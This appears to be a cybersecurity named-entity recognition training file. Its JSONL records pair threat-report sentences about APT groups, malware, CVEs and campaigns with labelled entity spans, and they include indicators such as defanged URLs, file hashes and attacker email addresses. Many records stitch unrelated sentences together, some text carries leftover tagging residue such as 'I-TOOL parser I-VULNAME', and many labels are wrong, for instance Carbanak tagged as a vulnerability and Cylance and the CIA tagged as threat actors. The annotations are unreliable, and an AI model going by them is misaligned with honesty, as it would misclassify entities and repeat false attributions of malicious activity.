{"text": "This is significant because it suggests that OnionDuke was under development before any part of the Duke operation became public .", "spans": {"MALWARE: OnionDuke": [[45, 54]], "THREAT_ACTOR: Duke": [[100, 104]]}, "info": {"id": "cyberner_stix_train_003783", "source": "cyberner_stix_train"}}
{"text": "APT35 also installed BROKEYOLK , a custom backdoor , to maintain persistence on the compromised host . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "TOOL: custom backdoor": [[35, 50]], "ORGANIZATION: government": [[183, 193]]}, "info": {"id": "cyberner_stix_train_003784", "source": "cyberner_stix_train"}}
{"text": "Users can not rely on the official app stores for their safety , and should implement advanced security protections capable of detecting and blocking zero-day mobile malware . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView . Then the connection is retried . Figure 2 : Historical Russia - nexus activity impacting OT", "spans": {"ORGANIZATION: Dragos WorldView": [[318, 334]], "THREAT_ACTOR: Russia - nexus activity": [[392, 415]], "SYSTEM: OT": [[426, 428]]}, "info": {"id": "cyberner_stix_train_003785", "source": "cyberner_stix_train"}}
{"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON , with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking TRITON and the research institute ( and therefore TEMP.Veles ) as one in the same .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[38, 48], [127, 137]], "ORGANIZATION: FireEye": [[51, 58]], "MALWARE: TRITON": [[160, 166], [297, 303]], "ORGANIZATION: Cyberwarcon": [[209, 220]], "ORGANIZATION: Kaspersky Lab": [[229, 242]], "ORGANIZATION: Security Analyst Summit": [[253, 276]], "MALWARE: TEMP.Veles": [[347, 357]]}, "info": {"id": "cyberner_stix_train_003786", "source": "cyberner_stix_train"}}
{"text": "The SMS message will be instantly sent to the server , informing the malware operator of executed tasks . The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"TOOL: PLATINUM tool": [[110, 123]], "TOOL: malware": [[158, 165]], "THREAT_ACTOR: Sowbug": [[257, 263]], "MALWARE: Felismus backdoor": [[316, 333]], "FILEPATH: adobecms.exe": [[393, 405]], "FILEPATH: CSIDL_WINDOWS\\debug": [[409, 428]]}, "info": {"id": "cyberner_stix_train_003787", "source": "cyberner_stix_train"}}
{"text": "On Tuesday , Arbor Networks said that it has new leads on a credential stealing remote access Trojan ( RAT ) called Ismdoor , possibly used by Greenbug to steal credentials on Shamoon 's behalf . TG-3390 uses DLL side loading , a technique that involves running a legitimate , typically digitally signed , program that loads a malicious DLL .", "spans": {"ORGANIZATION: Arbor Networks": [[13, 27]], "TOOL: Trojan": [[94, 100]], "TOOL: RAT": [[103, 106]], "TOOL: Ismdoor": [[116, 123]], "THREAT_ACTOR: TG-3390": [[196, 203]], "TOOL: DLL": [[337, 340]]}, "info": {"id": "cyberner_stix_train_003788", "source": "cyberner_stix_train"}}
{"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject “ Sending of New Year . While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Google": [[90, 96]], "ORGANIZATION: banks": [[172, 177]], "ORGANIZATION: law firm": [[182, 190]], "ORGANIZATION: bank": [[197, 201]], "TOOL: emails": [[255, 261]], "ORGANIZATION: Yahoo": [[282, 287]], "TOOL: email": [[290, 295]], "EMAIL: mts03282000@yahoo.co.jp": [[304, 327]]}, "info": {"id": "cyberner_stix_train_003789", "source": "cyberner_stix_train"}}
{"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros .", "spans": {"ORGANIZATION: 360 Core Security": [[67, 84]], "THREAT_ACTOR: APT-C-06": [[124, 132]], "THREAT_ACTOR: APT32": [[169, 174]], "FILEPATH: ActiveMime files": [[189, 205]]}, "info": {"id": "cyberner_stix_train_003790", "source": "cyberner_stix_train"}}
{"text": "The following are the three files:Defender.sct – The malicious JavaScript based scriptlet file . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"MALWARE: files:Defender.sct": [[28, 46]], "MALWARE: scriptlet": [[80, 89]], "MALWARE: file": [[90, 94]], "MALWARE: PIVY": [[97, 101], [363, 367]], "ORGANIZATION: chemical makers": [[175, 190]], "ORGANIZATION: government agencies": [[193, 212]], "ORGANIZATION: defense contractors": [[215, 234]], "THREAT_ACTOR: attackers": [[305, 314]], "VULNERABILITY: zero-day": [[322, 330]]}, "info": {"id": "cyberner_stix_train_003791", "source": "cyberner_stix_train"}}
{"text": "The techniques , tools , and procedures used in this campaign bear great resemblance to previous attacks attributed to the MoleRATs Group ( aka Gaza Cybergang Group ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": {"THREAT_ACTOR: MoleRATs": [[123, 131]], "THREAT_ACTOR: Gaza Cybergang": [[144, 158]]}, "info": {"id": "cyberner_stix_train_003792", "source": "cyberner_stix_train"}}
{"text": "This third campaign is consistent with two previously reported attack campaigns in terms of targeting : the targets were government organizations dealing with foreign affairs .", "spans": {}, "info": {"id": "cyberner_stix_train_003793", "source": "cyberner_stix_train"}}
{"text": "Hacking Team has been known to use both CVE-2014-3153 and CVE-2013-6282 in their attacks . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . This is further detailed below . In 2009 , the Winnti group shifted to targeting gaming companies in South Korea using a self - named data- and file - stealing malware .", "spans": {"VULNERABILITY: CVE-2014-3153": [[40, 53]], "VULNERABILITY: CVE-2013-6282": [[58, 71]], "VULNERABILITY: Carbanak": [[91, 99]], "ORGANIZATION: consumer": [[167, 175]], "TOOL: Carberp": [[267, 274]], "THREAT_ACTOR: Winnti group": [[324, 336]], "ORGANIZATION: gaming companies": [[358, 374]], "MALWARE: self - named data- and file - stealing malware": [[398, 444]]}, "info": {"id": "cyberner_stix_train_003794", "source": "cyberner_stix_train"}}
{"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"ORGANIZATION: government sector": [[37, 54]], "THREAT_ACTOR: Poseidon Group": [[99, 113]], "ORGANIZATION: executives": [[283, 293]]}, "info": {"id": "cyberner_stix_train_003795", "source": "cyberner_stix_train"}}
{"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 .", "spans": {"MALWARE: INI file": [[4, 12]], "TOOL: PowerShell": [[100, 110]], "MALWARE: VBS file": [[151, 159]], "MALWARE: WScript.exe": [[179, 190]], "MALWARE: POWRUNER": [[193, 201]], "FILEPATH: RTF file": [[234, 242]], "VULNERABILITY: CVE-2017-0199": [[258, 271]]}, "info": {"id": "cyberner_stix_train_003796", "source": "cyberner_stix_train"}}
{"text": "This feature added automatic error checking to critical parts of the program ’s execution at the cost , from a malware perspective , of providing additional hints that make the malware ’s functionality easier for reverse engineers to understand .", "spans": {}, "info": {"id": "cyberner_stix_train_003797", "source": "cyberner_stix_train"}}
{"text": "Similar to previous malware which infiltrated Google Play , such as FalseGuide and Skinner , Judy relies on the communication with its Command and Control server ( C & C ) for its operation . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses . The data is decrypted , the remote host list is parsed and verified using the BuildTargetIpListStruct function . So , when LockBit , the most active ransomware group in the world , is hitting three times as many victims as the next most active gang , you need to know how to prepare .", "spans": {"SYSTEM: Google Play": [[46, 57]], "MALWARE: FalseGuide": [[68, 78]], "MALWARE: Skinner": [[83, 90]], "ORGANIZATION: gaming studios": [[251, 265]], "ORGANIZATION: high tech businesses": [[270, 290]], "THREAT_ACTOR: LockBit": [[416, 423]], "THREAT_ACTOR: ransomware group": [[442, 458]]}, "info": {"id": "cyberner_stix_train_003798", "source": "cyberner_stix_train"}}
{"text": "Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"SYSTEM: Cisco Cloud Web Security ( CWS )": [[0, 32]], "SYSTEM: Web Security Appliance ( WSA )": [[36, 66]], "MALWARE: Previous versions": [[162, 179]], "ORGANIZATION: Kaspersky": [[198, 207]], "THREAT_ACTOR: Cylance": [[220, 227]], "EMAIL: watsonhenny@gmail.com": [[276, 297]], "ORGANIZATION: employees": [[339, 348]], "THREAT_ACTOR: APT38": [[377, 382]]}, "info": {"id": "cyberner_stix_train_003799", "source": "cyberner_stix_train"}}
{"text": "Indicators of Compromise ( IoCs ) hxxp : //mcsoft365.com/c hxxp : //pingconnect.net/c Hashes MD5 : 5c749c9fce8c41bf6bcc9bd8a691621b SHA256 : 284bd2d16092b4d13b6bc85d87950eb4c5e8cbba9af2a04d76d88da2f26c485c MD5 : b264af5d2f3390e465052ab502b0726d Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime . In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates .", "spans": {"THREAT_ACTOR: APT38": [[288, 293]], "ORGANIZATION: financial institutions": [[326, 348]], "ORGANIZATION: Symantec": [[470, 478]]}, "info": {"id": "cyberner_stix_train_003800", "source": "cyberner_stix_train"}}
{"text": "The information is then stored in local app database as well as sent to the backend . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application . U.S . cybersecurity firm FireEye also recently captured BlackOasis activity as part of a similar incident where the group relied on a different zero-day exploit — more specifically , a SOAP WSDL I-TOOL parser I-VULNAME E-TOOL code injection vulnerability — to install FinSpy onto a small number of devices . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": {"TOOL: Smart Installer Maker": [[146, 167]], "TOOL: self-extracting RAR": [[197, 216]], "TOOL: decoy slideshow": [[245, 260]], "TOOL: Flash installation application": [[264, 294]], "ORGANIZATION: FireEye": [[322, 329]], "THREAT_ACTOR: BlackOasis": [[353, 363]], "VULNERABILITY: zero-day": [[441, 449]], "TOOL: SOAP": [[482, 486]], "VULNERABILITY: WSDL I-TOOL parser I-VULNAME E-TOOL code injection": [[487, 537]], "MALWARE: FinSpy": [[565, 571]], "THREAT_ACTOR: FIN7": [[741, 745]]}, "info": {"id": "cyberner_stix_train_003801", "source": "cyberner_stix_train"}}
{"text": "But that does n't mean companies and organizations are out of the woods . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan . OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 . None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": {"ORGANIZATION: PwC UK": [[127, 133]], "ORGANIZATION: BAE Systems": [[138, 149]], "THREAT_ACTOR: threat actor": [[221, 233]], "ORGANIZATION: managed IT service providers": [[242, 270]], "THREAT_ACTOR: OceanLotus": [[351, 361]], "FILEPATH: 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999": [[364, 428]], "TOOL: PIEHOP": [[446, 452]]}, "info": {"id": "cyberner_stix_train_003802", "source": "cyberner_stix_train"}}
{"text": "Update as of July 23 , 2015 1:00 AM PDT ( UTC-7 ) We have added a link to a previous report discussing this threat . The leader of the crime gang behind the Carbanak and Cobalt malware attacks targeting over a 100 financial institutions worldwide has been arrested in Alicante , Spain , after a complex investigation conducted by the Spanish National Police . If the code can’t determine the mapping in later maturity levels , It is thought they were likely targeted because they might have information on foreign policy of countries towards Iran , negotiations over Irans nuclear program , or information about Iranian dissidents .", "spans": {"THREAT_ACTOR: crime gang": [[135, 145]], "VULNERABILITY: Carbanak": [[157, 165]], "ORGANIZATION: financial institutions": [[214, 236]], "ORGANIZATION: Iran": [[542, 546]], "ORGANIZATION: Irans": [[567, 572]], "ORGANIZATION: Iranian dissidents .": [[612, 632]]}, "info": {"id": "cyberner_stix_train_003803", "source": "cyberner_stix_train"}}
{"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ . The PowerShell version of the Trojan also has the ability to get screenshots . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) .", "spans": {"MALWARE: PowerShell": [[55, 65]], "THREAT_ACTOR: menuPass": [[197, 205]], "THREAT_ACTOR: Stone Panda": [[222, 233]], "THREAT_ACTOR: APT10": [[238, 243]]}, "info": {"id": "cyberner_stix_train_003804", "source": "cyberner_stix_train"}}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks .", "spans": {"ORGANIZATION: South Korean government": [[71, 94]], "ORGANIZATION: military": [[97, 105]], "ORGANIZATION: defense": [[112, 119]], "MALWARE: Trojan": [[167, 173]], "ORGANIZATION: banks": [[202, 207]]}, "info": {"id": "cyberner_stix_train_003805", "source": "cyberner_stix_train"}}
{"text": "The dynamically-loaded code is also flooded with meaningless commands that mask the actual commands passing through . As shown above , the threat runs several native binaries to collect useful information for its recon phase . Most AveMaria targets ( 72% ) were in the EU . We took google - analytics as an example , but other services can also be used .", "spans": {"TOOL: native binaries": [[159, 174]], "MALWARE: AveMaria": [[232, 240]], "ORGANIZATION: EU": [[269, 271]], "SYSTEM: google - analytics": [[282, 300]]}, "info": {"id": "cyberner_stix_train_003806", "source": "cyberner_stix_train"}}
{"text": "In October 2014 , FireEye released APT28 : A Window into Russia ’s Cyber Espionage Operations? , and characterized APT28 ’s activity as aligning with the Russian Government ’s strategic intelligence requirements .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT28": [[35, 40], [115, 120]], "SYSTEM: Window": [[45, 51]]}, "info": {"id": "cyberner_stix_train_003807", "source": "cyberner_stix_train"}}
{"text": "The dropped “ tf394kv.dll ” file is an external C&C communications library , compiled on July 24th , 2015 and used by the main backdoor for all Internet-based communications .", "spans": {"FILEPATH: tf394kv.dll": [[14, 25]], "TOOL: C&C": [[48, 51]]}, "info": {"id": "cyberner_stix_train_003808", "source": "cyberner_stix_train"}}
{"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "FILEPATH: decoy files": [[191, 202]]}, "info": {"id": "cyberner_stix_train_003809", "source": "cyberner_stix_train"}}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]], "THREAT_ACTOR: APT5": [[76, 80]], "ORGANIZATION: organizations": [[94, 107]], "ORGANIZATION: personnel": [[112, 121]]}, "info": {"id": "cyberner_stix_train_003810", "source": "cyberner_stix_train"}}
{"text": "This and following versions were masquerading as fake “ Adobe Flash Player ” apps . The OSB functions as the interface between CIA operational staff and the relevant technical support staff . CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": {"SYSTEM: Adobe Flash Player": [[56, 74]], "TOOL: OSB": [[88, 91]], "THREAT_ACTOR: CIA": [[127, 130]], "THREAT_ACTOR: CopyKittens": [[192, 203]]}, "info": {"id": "cyberner_stix_train_003811", "source": "cyberner_stix_train"}}
{"text": "] 26 192 [ . In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities . For newer operating systems, events.exe creates task.xml . We have not observed indications that the group claiming to be REvil that took part in the attack on the EIB was connected to the widely known ransomware group .", "spans": {"THREAT_ACTOR: APT37": [[23, 28]], "ORGANIZATION: chemicals": [[184, 193]], "ORGANIZATION: electronics": [[196, 207]], "ORGANIZATION: manufacturing": [[210, 223]], "ORGANIZATION: aerospace": [[226, 235]], "ORGANIZATION: automotive": [[238, 248]], "ORGANIZATION: healthcare entities": [[253, 272]], "FILEPATH: events.exe": [[304, 314]], "FILEPATH: task.xml": [[323, 331]], "THREAT_ACTOR: REvil": [[397, 402]], "ORGANIZATION: EIB": [[439, 442]]}, "info": {"id": "cyberner_stix_train_003812", "source": "cyberner_stix_train"}}
{"text": "Sofacy selectively used SPLM / CHOPSTICK modules as second stage implants to high interest targets for years now .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "MALWARE: SPLM": [[24, 28]], "MALWARE: CHOPSTICK": [[31, 40]]}, "info": {"id": "cyberner_stix_train_003813", "source": "cyberner_stix_train"}}
{"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP hosted domain that contains the following strings : “ google ” , ” android ” , ” 1e100 ” . The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . and as discovered later , even the U.S. and UK governments .", "spans": {"SYSTEM: Google Bouncer": [[44, 58]], "SYSTEM: android": [[369, 376]], "THREAT_ACTOR: group": [[397, 402]], "VULNERABILITY: (CVE-2018-0802)": [[455, 470]], "ORGANIZATION: governments": [[574, 585]]}, "info": {"id": "cyberner_stix_train_003814", "source": "cyberner_stix_train"}}
{"text": "We believe this activity , which dates back to at least July 2017 , was intended to target travelers to hotels throughout Europe and the Middle East .", "spans": {}, "info": {"id": "cyberner_stix_train_003815", "source": "cyberner_stix_train"}}
{"text": "] websiteaccounts-fb [ . In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . On the site “ www.china-one.org , ” the email address “ lfengg@163.com ” appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": {"TOOL: Infy": [[162, 166]], "DOMAIN: www.china-one.org": [[213, 230]], "TOOL: email": [[239, 244]], "EMAIL: lfengg@163.com": [[255, 269]], "ORGANIZATION: Kai Optical Information Technology": [[312, 346]], "ORGANIZATION: PLA": [[449, 452]], "ORGANIZATION: Unit 61398": [[453, 463]], "THREAT_ACTOR: XSS attacks": [[492, 503]], "SYSTEM: CSP": [[506, 509]]}, "info": {"id": "cyberner_stix_train_003816", "source": "cyberner_stix_train"}}
{"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex . ScarCruft uses a multi-stage binary infection scheme .", "spans": {"TOOL: BitPaymer": [[50, 59]], "TOOL: Dridex": [[171, 177]], "THREAT_ACTOR: ScarCruft": [[180, 189]]}, "info": {"id": "cyberner_stix_train_003817", "source": "cyberner_stix_train"}}
{"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the “ tk1 ” and “ input keyevent 3 ” commands . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT . APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos . The Twitter handle used by Hack520 indicates also an “ est ” portion .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[183, 195]], "THREAT_ACTOR: APT33": [[226, 231]], "MALWARE: 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos": [[234, 312]], "THREAT_ACTOR: Hack520": [[342, 349]]}, "info": {"id": "cyberner_stix_train_003818", "source": "cyberner_stix_train"}}
{"text": "After the server returns the solution , the app enters it into the appropriate text field to complete the CAPTCHA challenge . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update . After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": {"MALWARE: BLACKCOFFEE": [[278, 289]], "ORGANIZATION: FireEye-Microsoft": [[305, 322]], "VULNERABILITY: CVE-2013 - 0640": [[574, 589]]}, "info": {"id": "cyberner_stix_train_003819", "source": "cyberner_stix_train"}}
{"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"ORGANIZATION: FireEye": [[45, 52]], "MALWARE: BADRABBIT": [[89, 98]], "TOOL: BACKSWING": [[166, 175]], "THREAT_ACTOR: activity groups": [[217, 232]], "THREAT_ACTOR: PROMETHIUM": [[235, 245]], "THREAT_ACTOR: NEODYMIUM": [[250, 259]], "VULNERABILITY: zeroday": [[318, 325]], "VULNERABILITY: exploit": [[326, 333]]}, "info": {"id": "cyberner_stix_train_003820", "source": "cyberner_stix_train"}}
{"text": "Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest . According to statistics , Corkow primarily targets users in Russia and the CIS , but it is worth noting that in 2014 the amount of attacks targeting the USA increased by 5 times , in comparison with 2011 .", "spans": {"TOOL: Nbtscan": [[0, 7]], "THREAT_ACTOR: APT10": [[25, 30]], "ORGANIZATION: IT": [[103, 105]], "MALWARE: Corkow": [[177, 183]], "ORGANIZATION: users": [[202, 207]]}, "info": {"id": "cyberner_stix_train_003821", "source": "cyberner_stix_train"}}
{"text": "Creation date is a week before the start of the tournament . APT32 operations are characterized through deployment of signature malware payloads including WINDSHIELD , KOMPROGO , SOUNDBITE , and PHOREAL . The Ursnif variants were primarily grouped by C2 infrastructure . Companies conducing a risk analysis would be well served to consider such motivations when evaluating their exposure .", "spans": {"THREAT_ACTOR: APT32": [[61, 66]], "TOOL: WINDSHIELD": [[155, 165]], "TOOL: KOMPROGO": [[168, 176]], "TOOL: SOUNDBITE": [[179, 188]], "TOOL: PHOREAL": [[195, 202]], "MALWARE: Ursnif": [[209, 215]], "TOOL: C2": [[251, 253]]}, "info": {"id": "cyberner_stix_train_003822", "source": "cyberner_stix_train"}}
{"text": "With the enhanced post-breach detection capabilities of Windows Defender ATP , SOC personnel are able to reduce this period to hours or even minutes , significantly lessening the potential impact of persistent attacker access to their network .", "spans": {"TOOL: enhanced post-breach detection capabilities": [[9, 52]], "TOOL: Windows Defender ATP": [[56, 76]]}, "info": {"id": "cyberner_stix_train_003823", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . targeted attacks .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]]}, "info": {"id": "cyberner_stix_train_003824", "source": "cyberner_stix_train"}}
{"text": "Our logs show a number of simultaneous Red Alert 2.0 campaigns in operation , many ( but not all ) hosted on dynamic DNS domains . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts . The vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP . The infection starts with a malicious email containing a link that downloads a JS file that used to download DLL .", "spans": {"MALWARE: simultaneous Red Alert 2.0 campaigns": [[26, 62]], "ORGANIZATION: defectors": [[209, 218]], "MALWARE: Remexi": [[371, 377]], "THREAT_ACTOR: a malicious email containing a link that downloads a JS file that used to download DLL": [[432, 518]]}, "info": {"id": "cyberner_stix_train_003825", "source": "cyberner_stix_train"}}
{"text": "Lookout has determined ViperRAT is a very sophisticated threat that adds to the mounting evidence that targeted mobile attacks against governments and business is a real problem . Kaspersky APT Intelligence Reporting subscription , customers received an update in mid-February 2017 . Therefore , separate services can run , depending on how and where Svchost.exe is started . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: ViperRAT": [[23, 31]], "ORGANIZATION: Kaspersky APT Intelligence Reporting subscription": [[180, 229]], "FILEPATH: Svchost.exe": [[351, 362]], "VULNERABILITY: allowing code execution through PowerShell remoting": [[462, 513]]}, "info": {"id": "cyberner_stix_train_003826", "source": "cyberner_stix_train"}}
{"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television . Their primary interest appears to be gathering intelligence .", "spans": {"THREAT_ACTOR: threat actors": [[21, 34]], "ORGANIZATION: media organizations": [[93, 112]]}, "info": {"id": "cyberner_stix_train_003827", "source": "cyberner_stix_train"}}
{"text": "During this process , an amount of money , configured by the malicious operator , is requested to the user . Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": {"THREAT_ACTOR: ITG08": [[118, 123]], "TOOL: WMI": [[178, 181]], "TOOL: PowerShell": [[186, 196]], "ORGANIZATION: Talos": [[305, 310]], "MALWARE: ROKRAT": [[395, 401]]}, "info": {"id": "cyberner_stix_train_003828", "source": "cyberner_stix_train"}}
{"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ directory is empty . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": {"MALWARE: RAT": [[189, 192]]}, "info": {"id": "cyberner_stix_train_003829", "source": "cyberner_stix_train"}}
{"text": "System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors .", "spans": {"TOOL: System": [[0, 6]], "TOOL: YARA": [[42, 46]], "TOOL: system": [[59, 65]], "THREAT_ACTOR: HIDDEN COBRA": [[104, 116]]}, "info": {"id": "cyberner_stix_train_003830", "source": "cyberner_stix_train"}}
{"text": "Release_Time : unknown", "spans": {}, "info": {"id": "cyberner_stix_train_003831", "source": "cyberner_stix_train"}}
{"text": "This code will then download further payloads through a POST request to various websites .", "spans": {}, "info": {"id": "cyberner_stix_train_003832", "source": "cyberner_stix_train"}}
{"text": "We anticipate this malware to continue to evolve with additional new features ; the only question now is when we will see the next wave . While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": {"ORGANIZATION: organization’s": [[158, 172]], "ORGANIZATION: Novetta": [[490, 497]]}, "info": {"id": "cyberner_stix_train_003833", "source": "cyberner_stix_train"}}
{"text": "HIDDEN COBRA IOCs related to DeltaCharlie are provided within the accompanying .csv and .stix files of this alert .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[0, 12]], "TOOL: IOCs": [[13, 17]], "MALWARE: DeltaCharlie": [[29, 41]], "FILEPATH: .csv": [[79, 83]], "FILEPATH: .stix": [[88, 93]]}, "info": {"id": "cyberner_stix_train_003834", "source": "cyberner_stix_train"}}
{"text": "With the previous iterations of DealersChoice samples , the Flash object would immediately load and begin malicious tasks .", "spans": {"TOOL: DealersChoice": [[32, 45]], "TOOL: Flash": [[60, 65]]}, "info": {"id": "cyberner_stix_train_003835", "source": "cyberner_stix_train"}}
{"text": "A single compromised account could allow TG-4127 to achieve its operational goals .", "spans": {"THREAT_ACTOR: TG-4127": [[41, 48]]}, "info": {"id": "cyberner_stix_train_003837", "source": "cyberner_stix_train"}}
{"text": "We first detected members of this family back in March 2018 . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": {"THREAT_ACTOR: Waterbug": [[90, 98]], "TOOL: USB stealer": [[106, 117]], "FILEPATH: .scr": [[274, 278]]}, "info": {"id": "cyberner_stix_train_003838", "source": "cyberner_stix_train"}}
{"text": "Interestingly , the fact that the attack was blocked didn’t appear to stop the Sofacy team .", "spans": {"THREAT_ACTOR: Sofacy": [[79, 85]]}, "info": {"id": "cyberner_stix_train_003839", "source": "cyberner_stix_train"}}
